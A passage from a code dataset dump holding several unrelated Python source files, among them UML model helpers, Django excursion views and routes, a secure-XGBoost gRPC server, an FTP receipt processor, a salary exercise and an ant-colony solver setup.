bindings[p] = connectors\n return bindings\n \ndef copyStereotypes(a, b):\n for s in StereotypesHelper.getStereotypes(a):\n if not StereotypesHelper.hasStereotypeOrDerived(b, s):\n StereotypesHelper.addStereotype(b, s)\n smap = StereotypesHelper.getPropertiesIncludingParents(s)\n for sp in smap.keySet():\n props = smap.get(sp)\n for p in props:\n values = StereotypesHelper.getStereotypePropertyValue(a, s, p.getName())\n if len(values) == 1:\n StereotypesHelper.setStereotypePropertyValue(b, s, p.getName(), values.get(0))\n elif len(values) > 1:\n StereotypesHelper.setStereotypePropertyValue(b, s, p.getName(), values)\n\n\ndef createClass(name, owner):\n new = createOwnedElement(elementsFactory.createClassInstance, name, owner)\n return new\n\ndef createStereotypedClass(name, owner, stereotypes):\n new = createClass(name, owner)\n addStereotypes(new, stereotypes)\n return new\n\ndef createPackage(name, owner):\n new = createOwnedElement(elementsFactory.createPackageInstance, name, owner)\n return new\n\ndef createStereotypedPackage(name, owner, stereotypes):\n new = createOwnedElement(elementsFactory.createPackageInstance, name, owner)\n addStereotypes(new, stereotypes)\n return new\n\ndef createDependency(name, owner, client, supplier):\n new = createOwnedElement(elementsFactory.createDependencyInstance, name, owner)\n ModelHelper.setSupplierElement(new, supplier)\n ModelHelper.setClientElement(new, client)\n return new\n\ndef createStereotypedDependency(name, owner, client, supplier, stereotypes):\n new = createDependency(name, owner, client, supplier)\n addStereotypes(new, stereotypes)\n return new\n\ndef addStereotypes(element, stereotypes):\n for stereotype in stereotypes:\n StereotypesHelper.addStereotype(element, stereotype)\n \ndef createOwnedElement(createFunction, name, owner):\n new = createFunction()\n new.setOwner(owner)\n new.setName(name)\n return new\n\ndef findPackages(name, parentPackage):\n return filter(lambda x: x.getName() == name, parentPackage.getNestedPackage())\n\ndef removePackage(package):\n ModelElementsManager.getInstance().removeElement(package)\n\ndef removePackages(packages):\n for package in packages:\n removePackage(package)\n \ndef getOwnedElementsByStereotype(parentElement, stereotype = \"Block\"):\n return filter(lambda element: StereotypesHelper.hasStereotype(element, stereotype), parentElement.getOwnedElement())\n\n# Given an element, it returns all elements owned by the element that have the specified stereotypes\ndef getOwnedElementsByStereotypes(parentElement, stereotypes):\n return filter(lambda element: all(StereotypesHelper.hasStereotype(element, stereotype) \\\n for stereotype in stereotypes), \n parentElement.getOwnedElement())\n\ndef getOwnedElementsByAnyStereotypes(parentElement, stereotypes):\n return filter(lambda element: StereotypesHelper.hasStereotype(element, stereotypes), \n parentElement.getOwnedElement())\n\ndef getOwnedPackages(element):\n return getOwnedElementsByStereotype(element, \"Package\")\n\ndef getOwnedElementsByName(parentElement, name=\"\"):\n if \"\" == name:\n name = parentElement.getName()\n namedChildren = filter(lambda element: isinstance(element, NamedElement), parentElement.getOwnedElement())\n return filter(lambda element: str(name) == str(element.getName()), namedChildren)\n\ndef getOwnedAttributesByStereotype(parentElement, stereotype = \"Block\"):\n return filter(lambda element: StereotypesHelper.hasStereotype(element, stereotype),\n parentElement.getOwnedAttribute())\n\ndef 
getOwnedAttributesByType(parentElement, type):\n return filter(lambda attribute: attribute.getType() == type,\n parentElement.getOwnedAttribute())\n\ndef getOwnedAttributesByAnyTypeStereotypes(parentElement, stereotypes):\n return filter(lambda attribute: StereotypesHelper.hasStereotypeOrDerived(attribute.getType(), stereotypes),\n filter (lambda attribute: attribute.getType() != None, parentElement.getOwnedAttribute()))\n\ndef getOwnedAttributesByAllTypeStereotypes(parentElement, stereotypes):\n return filter(lambda attribute: all(StereotypesHelper.hasStereotypeOrDerived(attribute.getType(), stereotype) \\\n for stereotype in stereotypes),\n parentElement.getOwnedAttribute())\n\n# Given an element, it returns all elements owned by the element that have the specified stereotypes\ndef getOwnedAttributesByAllStereotypes(parentElement, stereotypes):\n return filter(lambda element: all(StereotypesHelper.hasStereotype(element, stereotype) \\\n for stereotype in stereotypes), \n parentElement.getOwnedAttribute())\n\ndef getOwnedAttributesByAnyStereotypes(parentElement, stereotypes):\n return filter(lambda element: StereotypesHelper.hasStereotype(element, stereotypes), \n parentElement.getOwnedAttribute())\n\ndef getOwnedAttributesByName(parentElement, name=\"\"):\n if \"\" == name:\n name = parentElement.getName()\n namedChildren = filter(lambda element: isinstance(element, NamedElement), parentElement.getOwnedAttribute())\n return filter(lambda element: str(name) == str(element.getName()), namedChildren)\n\n# Todo:\n# * Need to check that property is UML property type.\n# * Need to make sure that UML instance values are handled correctly\ndef getDefault(property):\n if property != None:\n default = property.getDefault()\n if default != None:\n if StereotypesHelper.hasStereotypeOrDerived(property, ValuePropertyStereotype):\n if default == '':\n return None\n else:\n return float(default)\n #elif isinstance(property, BooleanValueType):\n # if lower(default) in TrueStrings:\n # return True\n # elif lower(default) in FlaseStrings:\n # return False\n # else:\n # return None\n else:\n return default\n else:\n return default\n else:\n return None\n\n# Todo:\n# * Need to check that property is UML property type.\n# * Need to make sure that UML instance values are handled correctly\ndef setDefault(property, default):\n if default != None:\n #if isinstance(property, RealValueType):\n # defaultValue = elementsFactory.createLiteralUnlimitedNaturalInstance()\n # defaultValue.setValue(float(default))\n #elif isinstance(property, IntegerValueType):\n # defaultValue = elementsFactory.createLiteralIntegerInstance()\n # defaultValue.setValue(int(round(float(default))))\n #elif isinstance(property, BooleanValueType):\n # defaultValue = elementsFactory.createBooleanInstance()\n # if not default in [True, False]:\n # default = lower(default) in TrueStrings\n # defaultValue.setValue(default)\n #else:\n defaultValue = elementsFactory.createLiteralStringInstance()\n defaultValue.setValue(str(default))\n property.setDefaultValue(defaultValue)\n return defaultValue\n else:\n return None\n\ndef doRecursively(parent, getChildrenFunction, doForEachChildFunction, doOnExitFunction, *args):\n try:\n for child in getChildrenFunction(parent):\n doForEachChildFunction(child, *args)\n doRecursively(child, getChildrenFunction, doForEachChildFunction, doOnExitFunction, *args)\n doOnExitFunction(parent, *args)\n except:\n raise\n\ndef createGeneralizationInstance(parent, child):\n ''' Creates a generalization instance and:\n 1. 
Sets the generalization supplier as the parent.\n 2. Sets the generalization client as the child.\n 3. Sets the owner of the generalization as the child. '''\n generalizationInstance = elementsFactory.createGeneralizationInstance()\n ModelHelper.setClientElement(generalizationInstance, child)\n ModelHelper.setSupplierElement(generalizationInstance, parent)\n generalizationInstance.setOwner(child)\n","sub_path":"src/main/dist/DocGenUserScripts/MDUtils/_MDUtils.py","file_name":"_MDUtils.py","file_ext":"py","file_size_in_byte":27742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"97733649","text":"import json\nfrom uuid import uuid4\nfrom django.core.files.base import ContentFile\nfrom django.db.transaction import atomic\nfrom django.http.response import HttpResponseBadRequest\nfrom excursions.models import Excursion, ExcursionCategory, ExcursionImage\n\n\ndef _excursion_context(request):\n categories = ExcursionCategory.objects\n if not request.user.has_perm(\"excursions.change_excursion\"):\n categories = categories.visible()\n categories = categories.order_by(\"order\", \"title\")\n\n if not request.user.is_authenticated():\n categories = filter(lambda c: Excursion.objects.filter(category=c, published=True).count() > 0, categories)\n\n return {\n 'categories': categories\n }\n\n\n@atomic\ndef _save_excursions_galley_images_order(request):\n order = request.POST['order']\n order = json.loads(order)\n for image in ExcursionImage.objects.filter(id__in=order.keys()):\n image.order = order[unicode(image.id)] or 100\n image.save()\n\n\ndef _excursion_save(request):\n if 'id' in request.POST:\n e = Excursion.objects.get(pk=int(request.POST['id']))\n else:\n if 'category_id' in request.POST:\n e = Excursion()\n else:\n return HttpResponseBadRequest(\"category_id is not defined\")\n if 'small_image' in request.FILES:\n f = request.FILES['small_image']\n ext = f.name.split('.')[-1]\n e.img_preview.delete()\n e.img_preview.save('%s.%s' % (uuid4(), ext), ContentFile(f.read()))\n e.save()\n\n if 'big_image' in request.FILES:\n f = request.FILES['big_image']\n ext = f.name.split('.')[-1]\n if e.image.name:\n e.image.delete()\n e.image.save('%s.%s' % (uuid4(), ext), ContentFile(f.read()))\n e.save()\n\n if 'gallery[]' in request.FILES:\n for f in request.FILES.getlist('gallery[]'):\n ext = f.name.split('.')[-1]\n image = ExcursionImage()\n image.excursion = e\n image.image.save('%s.%s' % (uuid4(), ext), ContentFile(f.read()))\n image.save()\n\n if 'yandex_map_script' in request.POST:\n e.yandex_map_script = request.POST['yandex_map_script']\n\n if 'order' in request.POST:\n _save_excursions_galley_images_order(request)\n\n if 'category_id' in request.POST and e.category_id != int(request.POST['category_id']):\n e.category_id = int(request.POST['category_id'])\n\n if 'title' in request.POST:\n e.title = request.POST['title']\n\n if 'price_list' in request.POST:\n e.priceList = request.POST['price_list']\n\n if 'time_length' in request.POST:\n e.time_length = request.POST['time_length']\n\n if 'min_age' in request.POST:\n e.min_age = request.POST['min_age']\n\n if 'description' in request.POST:\n e.description = request.POST['description']\n\n if 'short_description' in request.POST:\n e.short_description = request.POST['short_description']\n\n if 'published' in request.POST:\n e.published = request.POST['published'] == 'True'\n\n if 'popular' in request.POST:\n e.popular = request.POST['popular'] == 'True'\n\n 
e.save()","sub_path":"apps/excursions/views/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":3136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"228401377","text":"# Copyright 2015 gRPC authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"The Python implementation of the GRPC RemoteAttestation server.\"\"\"\n\nfrom concurrent import futures\nimport logging\n\nimport grpc\n\n# import rpc.remote_pb2\n# import rpc.remote_pb2_grpc\nfrom .rpc import remote_pb2\nfrom .rpc import remote_pb2_grpc\nfrom rpc_utils import *\nimport os\nimport sys\nimport traceback\nfrom .core import RemoteAPI as remote_api\n\n# c_bst_ulong corresponds to bst_ulong defined in xgboost/c_api.h\nc_bst_ulong = ctypes.c_uint64\n\n\nimport threading\nimport types\n\nclass Command(object):\n \"\"\"\n Commands submitted for execution to remote server\n \"\"\"\n def __init__(self):\n self.reset()\n\n def reset(self):\n self._func = None\n self._params = None\n self._ret = None\n self._usernames = []\n self._signatures = []\n self._sig_lengths = []\n self._retrieved = []\n\n def submit(self, func, params, username):\n if self._func is None:\n self._func = func\n self._params = params\n else:\n assert self._func == func\n self._usernames.append(username)\n self._signatures.append(params.signature)\n self._sig_lengths.append(params.sig_len)\n\n def is_ready(self):\n for user in globals()[\"all_users\"]:\n if user not in self._usernames:\n return False\n return True\n\n def invoke(self):\n self._ret = self._func(self._params, self._usernames, self._signatures, self._sig_lengths)\n\n def result(self, username):\n self._retrieved.append(username)\n ret = self._ret\n if self.is_complete():\n self.reset()\n return ret\n\n def is_complete(self):\n for user in globals()[\"all_users\"]:\n if user not in self._retrieved:\n return False\n return True\n\n\ndef handle_exception():\n e = sys.exc_info()\n print(\"Error type: \" + str(e[0]))\n print(\"Error value: \" + str(e[1]))\n traceback.print_tb(e[2])\n\n status = remote_pb2.Status(status=-1, exception=str(e[1]))\n return status\n\n\nclass RemoteServicer(remote_pb2_grpc.RemoteServicer):\n\n def __init__(self, enclave, condition, command):\n self.enclave = enclave\n self.condition = condition\n self.command = command\n\n def _synchronize(self, func, params):\n username = params.username\n\n self.condition.acquire() \n self.command.submit(func, params, username)\n if self.command.is_ready():\n self.command.invoke()\n ret = self.command.result(username)\n self.condition.notifyAll()\n else:\n self.condition.wait()\n ret = self.command.result(username)\n self.condition.release()\n return ret\n\n def rpc_get_remote_report_with_pubkey(self, request, context):\n \"\"\"\n Calls get_remote_report_with_pubkey()\n \"\"\"\n try:\n # Get report from enclave\n pem_key, pem_key_size, remote_report, remote_report_size = remote_api.get_remote_report_with_pubkey(request)\n\n status = remote_pb2.Status(status=0)\n return 
remote_pb2.Report(pem_key=pem_key, pem_key_size=pem_key_size, remote_report=remote_report, remote_report_size=remote_report_size, status=status)\n except:\n status = handle_exception()\n return remote_pb2.Report(status=status)\n\n def rpc_get_remote_report_with_pubkey_and_nonce(self, request, context):\n pem_key, key_size, nonce, nonce_size, remote_report, remote_report_size = remote_api.get_remote_report_with_pubkey_and_nonce(request)\n\n return remote_pb2.Report(pem_key=pem_key, pem_key_size=key_size,\n nonce=nonce, nonce_size=nonce_size,\n remote_report=remote_report, remote_report_size=remote_report_size)\n\n # FIXME implement the library call within class RemoteAPI\n def rpc_add_client_key(self, request, context):\n \"\"\"\n Sends encrypted symmetric key, signature over key, and filename of data that was encrypted using the symmetric key\n \"\"\"\n try:\n # Get encrypted symmetric key, signature, and filename from request\n enc_sym_key = request.enc_sym_key\n key_size = request.key_size\n signature = request.signature\n sig_len = request.sig_len\n\n # Get a reference to the existing enclave\n result = self.enclave._add_client_key(enc_sym_key, key_size, signature, sig_len)\n\n return remote_pb2.Status(status=result)\n except:\n status = handle_exception()\n return status\n\n # FIXME implement the library call within class RemoteAPI\n def rpc_add_client_key_with_certificate(self, request, context):\n \"\"\"\n Calls add_client_key_with_certificate()\n \"\"\"\n try:\n # Get encrypted symmetric key, signature, and certificate from request\n certificate = request.certificate\n enc_sym_key = request.enc_sym_key\n key_size = request.key_size\n signature = request.signature\n sig_len = request.sig_len\n\n # Get a reference to the existing enclave\n result = self.enclave._add_client_key_with_certificate(certificate, enc_sym_key, key_size, signature, sig_len)\n\n return remote_pb2.Status(status=result)\n except:\n status = handle_exception()\n return status\n\n def rpc_get_enclave_symm_key(self, request, context):\n \"\"\"\n Calls get_remote_report_with_pubkey()\n \"\"\"\n try:\n # Get report from enclave\n enc_key, enc_key_size = remote_api.get_enclave_symm_key(request)\n enc_key_proto = pointer_to_proto(enc_key, enc_key_size + CIPHER_IV_SIZE + CIPHER_TAG_SIZE)\n\n status = remote_pb2.Status(status=0)\n return remote_pb2.EnclaveKey(key=enc_key_proto, size=enc_key_size, status=status)\n except:\n status = handle_exception()\n return remote_pb2.Report(status=status)\n\n def rpc_XGDMatrixCreateFromEncryptedFile(self, request, context):\n \"\"\"\n Create DMatrix from encrypted file\n \"\"\"\n try:\n dmatrix_handle = self._synchronize(remote_api.XGDMatrixCreateFromEncryptedFile, request)\n status = remote_pb2.Status(status=0)\n return remote_pb2.Name(name=dmatrix_handle, status=status)\n except:\n status = handle_exception()\n return remote_pb2.Name(name=None, status=status)\n\n def rpc_XGBoosterSetParam(self, request, context):\n \"\"\"\n Set booster parameter\n \"\"\"\n try:\n _ = self._synchronize(remote_api.XGBoosterSetParam, request)\n return remote_pb2.Status(status=0)\n except:\n status = handle_exception()\n return status\n\n def rpc_XGBoosterCreate(self, request, context):\n \"\"\"\n Create a booster\n \"\"\"\n try:\n booster_handle = self._synchronize(remote_api.XGBoosterCreate, request)\n status = remote_pb2.Status(status=0)\n return remote_pb2.Name(name=booster_handle, status=status)\n except:\n status = handle_exception()\n return remote_pb2.Name(status=status)\n\n def 
rpc_XGBoosterUpdateOneIter(self, request, context):\n \"\"\"\n Update model for one iteration\n \"\"\"\n try:\n _ = self._synchronize(remote_api.XGBoosterUpdateOneIter, request)\n return remote_pb2.Status(status=0)\n except:\n status = handle_exception()\n return status\n\n def rpc_XGBoosterPredict(self, request, context):\n \"\"\"\n Get encrypted predictions\n \"\"\"\n try:\n enc_preds, num_preds = self._synchronize(remote_api.XGBoosterPredict, request)\n enc_preds_proto = pointer_to_proto(enc_preds, num_preds * ctypes.sizeof(ctypes.c_float) + CIPHER_IV_SIZE + CIPHER_TAG_SIZE)\n status = remote_pb2.Status(status=0)\n return remote_pb2.Predictions(predictions=enc_preds_proto, num_preds=num_preds, status=status)\n\n except:\n status = handle_exception()\n return remote_pb2.Predictions(status=status)\n\n def rpc_XGBoosterSaveModel(self, request, context):\n \"\"\"\n Save model to encrypted file\n \"\"\"\n try:\n _ = self._synchronize(remote_api.XGBoosterSaveModel, request)\n return remote_pb2.Status(status=0)\n\n except:\n status = handle_exception()\n return status\n\n def rpc_XGBoosterLoadModel(self, request, context):\n \"\"\"\n Load model from encrypted file\n \"\"\"\n try:\n _ = self._synchronize(remote_api.XGBoosterLoadModel, request)\n return remote_pb2.Status(status=0)\n\n except:\n status = handle_exception()\n return status\n\n def rpc_XGBoosterDumpModelEx(self, request, context):\n \"\"\"\n Get encrypted model dump\n \"\"\"\n try:\n length, sarr = self._synchronize(remote_api.XGBoosterDumpModelEx, request)\n status = remote_pb2.Status(status=0)\n return remote_pb2.Dump(sarr=sarr, length=length, status=status)\n\n except:\n status = handle_exception()\n return remote_pb2.Dump(status=status)\n\n def rpc_XGBoosterDumpModelExWithFeatures(self, request, context):\n \"\"\"\n Get encrypted model dump with features\n \"\"\"\n try:\n length, sarr = self._synchronize(remote_api.XGBoosterDumpModelExWithFeatures, request)\n status = remote_pb2.Status(status=0)\n return remote_pb2.Dump(sarr=sarr, length=length, status=status)\n\n except:\n status = handle_exception()\n return remote_pb2.Dump(status=status)\n\n def rpc_XGBoosterGetModelRaw(self, request, context):\n \"\"\"\n Get encrypted raw model dump\n \"\"\"\n try:\n length, sarr = self._synchronize(remote_api.XGBoosterGetModelRaw, request)\n status = remote_pb2.Status(status=0)\n return remote_pb2.Dump(sarr=sarr, length=length, status=status)\n\n except:\n status = handle_exception()\n return remote_pb2.Dump(status=status)\n\n def rpc_XGDMatrixNumCol(self, request, context):\n \"\"\"\n Get number of columns in DMatrix\n \"\"\"\n try:\n ret = self._synchronize(remote_api.XGDMatrixNumCol, request)\n status = remote_pb2.Status(status=0)\n return remote_pb2.Integer(value=ret, status=status)\n\n except:\n status = handle_exception()\n return remote_pb2.Integer(status=status)\n\n def rpc_XGDMatrixNumRow(self, request, context):\n \"\"\"\n Get number of rows in DMatrix\n \"\"\"\n try:\n ret = self._synchronize(remote_api.XGDMatrixNumRow, request)\n status = remote_pb2.Status(status=0)\n return remote_pb2.Integer(value=ret, status=status)\n\n except:\n status = handle_exception()\n return remote_pb2.Integer(status=status)\n\ndef serve(enclave, num_workers=10, all_users=[]):\n condition = threading.Condition()\n command = Command()\n globals()[\"all_users\"] = all_users\n\n rpc_server = grpc.server(futures.ThreadPoolExecutor(max_workers=num_workers))\n remote_pb2_grpc.add_RemoteServicer_to_server(RemoteServicer(enclave, condition, command), 
rpc_server)\n rpc_server.add_insecure_port('[::]:50051')\n rpc_server.start()\n rpc_server.wait_for_termination()\n\n","sub_path":"python-package/securexgboost/remote_server.py","file_name":"remote_server.py","file_ext":"py","file_size_in_byte":12149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"25001888","text":"'''\n Organizações Tabajara decided to give their employees a raise and hired you to\ndevelop the program that will compute the adjustments. Write a program that reads an employee's \nsalary and applies the raise according to the following rules, based on the current salary: \n\n• salaries up to R$ 280,00 (inclusive): a 20% raise;\n• salaries between R$ 280,00 and R$ 700,00 (700,00 excluded): a 15% raise;\n• salaries between R$ 700,00 and R$ 1500,00 (1500,00 excluded): a 10% raise;\n• salaries from R$ 1500,00 upwards: a 5% raise;\n\nAfter the raise is applied, print: \n• the salary before the adjustment;\n• the raise percentage applied;\n• the amount of the raise;\n• the new salary after the raise, as described below (one output per line).\n\nEX.\nSalario anterior:750.00\nPercentual de aumento:10.00%\nNovo salario:825.00\n'''\n\n# Salary input\nsalario = float(input(\"\"))\naumento = 0\nprint(\"Salario anterior:{0:.2f}\".format(salario))\n\n# Raise bracket\nif salario <= 280:\n aumento = float((salario * 20)/100)\n print(\"Percentual de aumento:20.00%\")\nif salario > 280 and salario < 700:\n aumento = float((salario * 15)/100)\n print(\"Percentual de aumento:15.00%\")\nif salario >= 700 and salario < 1500:\n aumento = float((salario * 10)/100)\n print(\"Percentual de aumento:10.00%\")\nif salario >= 1500:\n aumento = float((salario * 5)/100)\n print(\"Percentual de aumento:5.00%\")\n\n# New salary\nprint(\"Novo salario:{0:.2f}\".format(aumento + salario))","sub_path":"Python/Lista2_Python/exercicio1_lista2_Python.py","file_name":"exercicio1_lista2_Python.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"491532874","text":"from sqlalchemy import Table, Column, ForeignKey, Integer, String, MetaData, create_engine\nimport tools.prefix as pfx\nfrom tools import configuration\nimport os\n\n#Base = declarative_base()\n\"\"\"\nclass Group(Base):\n __tablename__ = \"group\"\n id = Column(Integer, primary_key=True)\n name = Column(String(250), nullable=False)\n\nclass Account(Base):\n __tablename__ = \"account\"\n id = Column(Integer, primary_key=True)\n name = Column(String(250), nullable=False)\n encrypted = Column(String(500), nullable=False)\n group_id = Column(Integer, ForeignKey(\"group.id\"))\n\n\"\"\"\ndef log(note):\n print(pfx.NOTE + note, end=\" \")\n\ndef log_OK():\n print(\"OK\")\n\ndef log_FAIL():\n print(\"FAILED\")\n\ndef make_group(meta):\n # Same comment as the make_account function\n Table(\"group\", meta,\n Column(\"id\", Integer, primary_key=True),\n Column(\"name\", String)\n )\n\n #return group ## Dont need \n\ndef make_account(meta):\n # Can assign this to a variable and return it\n # Dont need it just yet\n Table(\"account\", meta,\n Column(\"id\", Integer, primary_key=True),\n Column(\"name\", String),\n Column(\"encrypted\", String),\n Column(\"group_id\", Integer, ForeignKey(\"group.id\"))\n )\n\n # return account ## Doesnt seem like I need this just yet\n\ndef create():\n data = configuration.load_data()\n log(\"Reading data from CONFIG.JSON:\")\n if data is not False:\n 
log_OK()\n log(\"Creating database engine:\")\n\n file_name = data[\"database\"][\"database_name\"]\n absolute_path = os.path.abspath(os.path.join(__file__, \"../\"))\n database_name = f\"sqlite:///{absolute_path}/{file_name}\" # Using three /'s because the fourth is added with the absolute file\n engine = create_engine(database_name, echo=False)\n\n log_OK()\n log(\"Creating database metadata:\")\n meta = MetaData()\n log_OK()\n\n make_group(meta)\n make_account(meta)\n\n log(\"Creating database:\")\n meta.create_all(engine)\n log_OK()\n \n print(pfx.SUCCESS + \"Finished creating the database!\")\n else:\n log_FAIL()\n print(pfx.WARNING + \"Could not load data from config.json\")","sub_path":"storage/sqlalchemy_delcare.py","file_name":"sqlalchemy_delcare.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"58331981","text":"from django.urls import path\nfrom django.views.generic import TemplateView\nfrom django.contrib.auth.views import LoginView, LogoutView\nfrom django.contrib.auth.decorators import login_required\n\nfrom Pandas.views import PracticaUnoAPIView,javascript, SaludoView\n\napp_name='panda'\n\n\nurlpatterns = [\n\n #javascript\n path('javascript', \n javascript, \n name='js'),\n\n #LOGIN\n path('login', \n TemplateView.as_view(template_name='login.html'), \n name='login'),\n #LOGOUT\n path('logout', \n LogoutView.as_view(next_page=\"/\"), \n name=\"logout\"),\n\n\n #AJAX ACTIONS ARE LOADED HERE\n\n\n path('', \n \n TemplateView.as_view(template_name=\"base/base.html\"), \n name=\"index\"),\n\n path('home',\n \n TemplateView.as_view(template_name=\"home.html\"), \n name=\"home\"),\n\n #GROUPING API\n path('api/v1/agrupacion', \n PracticaUnoAPIView.as_view(), \n name=\"agrupacion-api\"),\n \n #GROUPING VIEW\n path('agrupacion-view', \n TemplateView.as_view(\n template_name='practica1/table_one.html'), \n name='agrupacion-view'),\n\n\n #===== AUTHENTICATED VIEWS =====#\n\n path('hello/', SaludoView.as_view(), name=\"hello-api\"),\n\n\n]\n","sub_path":"Pandas/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"270563292","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n# @Software : loop_server\n# @File : mftp_process.py\n# @Author : zaniu (Zzaniu@126.com)\n# @Date : 2018/12/12 20:05\n# @Description :\nimport os\nimport time\nimport re\nimport datetime\nimport traceback\nfrom multiprocessing import Process\nfrom threading import Thread\n\nfrom conf import settings\nfrom utils import log,mail\nfrom manifest.mf_analyze import ReceiptHandler\n\nlogger = log.getlogger(__name__)\n\n\nclass MFTPProcess(Process):\n def __init__(self):\n super().__init__()\n self.name = \"FTP process-{}\".format(datetime.datetime.now().strftime(\"%Y%m%d%H%M%S\"))\n\n def run(self):\n if settings.FTP_TASK:\n self.analyze_receipt_upload_to_mdn()\n\n def analyze_receipt_upload_to_mdn(self):\n \"\"\"Parse receipts and upload the generated receipts to the mdn folder\"\"\"\n t = Thread(target=self.thread_analyze_receipt_upload_to_mdn)\n t.start()\n\n def thread_analyze_receipt_upload_to_mdn(self):\n \"\"\"Thread that parses receipts and uploads the generated receipts to the mdn folder\"\"\"\n while 1:\n try:\n logger.info('ftp analyze upload start')\n self.task_analyze_receipt_upload_to_mdn()\n logger.info('ftp analyze upload end')\n time.sleep(settings.LOOP_TIME)\n except Exception as e:\n logger.exception(e)\n 
mail.send_email(text=str(traceback.format_exc()),subject=\"Receipt parse/generate/upload thread exception, please handle it immediately\")\n logger.warn(\"Receipt parse/generate/upload thread exception, notified by email\")\n time.sleep(settings.EXCEPTION_WAIT_TIME)\n\n def task_analyze_receipt_upload_to_mdn(self):\n \"\"\"Parse receipts and update the database status\"\"\"\n client_tmp_files = os.listdir(settings.RECEIPT_INOBX_MF)\n logger.info(\"Number of files to process: {}\".format(len(client_tmp_files)))\n client_tmp_files = self.handle_files_order(client_tmp_files)\n if len(client_tmp_files) > 0:\n for name in client_tmp_files:\n file_path = os.path.join(settings.RECEIPT_INOBX_MF, name)\n handler = ReceiptHandler(file_path)\n handler.exec()\n logger.info(\"Finished parsing receipts and uploading the generated receipts\")\n\n def handle_files_order(self,files):\n \"\"\"Sort the receipts by their generation time dDate; the files must be opened to read the content\"\"\"\n receipt_files = []\n other_files = []\n for file_name in files:\n if \"Receipt\" in file_name:\n receipt_files.append(file_name)\n else:\n other_files.append(file_name)\n receipt_files_dict = {}\n for file_name in receipt_files:\n file_path = os.path.join(settings.RECEIPT_INOBX_MF, file_name)\n with open(file_path, encoding=\"utf-8\") as f:\n content = f.read()\n ret = re.search(r\"<dDate>(.*?)</dDate>\", content) # sort the receipts by dDate\n if ret:\n receipt_files_dict[file_path] = datetime.datetime.strptime(ret.group(1), \"%Y%m%d%H%M%S%f\")\n s = sorted(receipt_files_dict.items(), key=lambda x: x[1])\n b = [i[0] for i in s]\n return other_files+b\n\n\nif __name__ == \"__main__\":\n MFTPProcess().start()\n","sub_path":"manifest/mftp_process.py","file_name":"mftp_process.py","file_ext":"py","file_size_in_byte":3278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"56540568","text":"from django.urls import path\nfrom . import views\n\napp_name = 'notes'\n\nurlpatterns = [\n path('', views.NotesTemplateView.as_view(), name='notes'),\n path('/', views.NotesListView.as_view(), name='notes_by_type'),\n path('create///', views.NoteCreateView.as_view(), name='note_create'),\n]","sub_path":"ingredient_order_site/notes/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"215833084","text":"from setuptools import setup\nfrom setuptools import find_packages\n\nlong_description = \"\"\"\nSatellite Preprocessing library for BaseMap1\n\"\"\"\n\nNAME = 'SatZoomer'\n\nrequires = ['numpy>=1.9.1',\n 'scikit-image',\n 'pandas']\n\nclassifiers = ['Development Status :: 2 - Pre-Alpha',\n 'License :: Other/Proprietary License',\n 'Programming Language :: Python :: 3',\n 'Operating System :: Microsoft :: Windows',\n 'Topic :: Scientific/Engineering :: Visualization']\n\nsetup(name=NAME,\n version='1.0.0',\n description='Satellite Image Processing',\n long_description=long_description,\n author='Jacob Rainbow',\n author_email='jacob.rainbow@os.uk',\n url='https://github.com/JRainbowOS/satzoomer',\n install_requires=requires,\n python_requires='>3.6',\n classifiers=classifiers,\n packages=find_packages()\n )\n\n# Needs Python 3.6 due to format strings. 
This library does not support Python 2.7.","sub_path":"pypi_install_script/SatZoomer-1.0.0.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"175367796","text":"import pandas as pd\nimport pickle\n\n\ndef memoize(f):\n memo = {}\n\n def helper(*args, **kwargs):\n\n if args[0] not in memo:\n memo[args[0]] = pickle.dumps(f(*args, **kwargs))\n return pickle.loads(memo[args[0]])\n return helper\n\n\n@memoize\ndef open_calibration(file_path: str, pair_mode=False):\n with open(file_path) as f:\n cc = pd.Series([\n float(v) for v in f.read().splitlines()\n ])\n\n if not pair_mode:\n return cc\n\n cc_odd = cc.copy()\n cc.index *= 2\n cc_odd.index = cc.index+1\n return pd.concat((cc, cc_odd))\n","sub_path":"calibration/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"218190409","text":"'''\nCreated on 12 apr. 2018\n\n@author: Sara Boanca\n'''\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom random import randint, random, shuffle, choice\nfrom copy import deepcopy\n\nclass Problem:\n def __init__(self, fileName, fileNameWords, fileNameParameters):\n self.__fileName = fileName\n items = []\n items = self.readFromFile(self.__fileName)\n self.__lines = items[0]\n self.__columns = items[1]\n self.__blanks = items[2]\n self.__matrix = items[3]\n self.__slots = items[4]\n words = []\n words = self.readFromFileWords(fileNameWords)\n self.__words = words\n parameters = self.readFromFileParameters(fileNameParameters)\n self.__noEpoch = parameters[0]\n self.__noAnts = parameters[1]\n self.__alpha = parameters[2]\n self.__beta = 